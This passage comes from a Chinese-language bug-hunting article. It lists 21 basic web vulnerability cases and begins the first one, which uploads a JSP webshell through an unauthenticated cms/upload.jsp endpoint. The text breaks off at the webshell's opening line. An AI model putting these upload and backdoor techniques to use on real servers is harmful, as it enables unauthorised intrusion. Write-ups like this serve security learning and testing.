【网络安全|漏洞挖掘】分享21个基础漏洞案例

未经许可，不得转载。

文章目录 案例1：绕过500状态码 案例2：修改前端实现任意文件上传 案例3：Nmap扫描端口命令 案例4：绕过限制实现任意文件读取 案例5：删除任意目录文件 案例6：锁定任意账户 案例7：重置任意用户密码 案例8：接管任意账户 方法一 方法二 案例9：功能校验机制绕过 案例10：恶意刷光用户积分 案例11：未授权下载文件 案例12：订单系统获取敏感信息 案例13：密码找回功能点账户接管 案例14：短信轰炸 案例15：图像验证码未失效 案例16：Host头攻击 案例17：域名防护设置缺失 案例18：短信验证码使用后未失效 案例19：URL传输Token信息 案例20：启用自动填充功能 案例21：支付逻辑场景

案例1：绕过500状态码

某Web应用的 cms/upload.jsp 接口用于上传文件。然而，在未登录的情况下，直接使用 GET 或 POST 请求访问该接口，会返回错误信息：

拦截上传请求，并构造包含JSP WebShell的恶意数据包，上传后门文件。以下代码会在服务器的指定目录下写入一个JSP文件：

<%if(request.getParameter("f")!=null)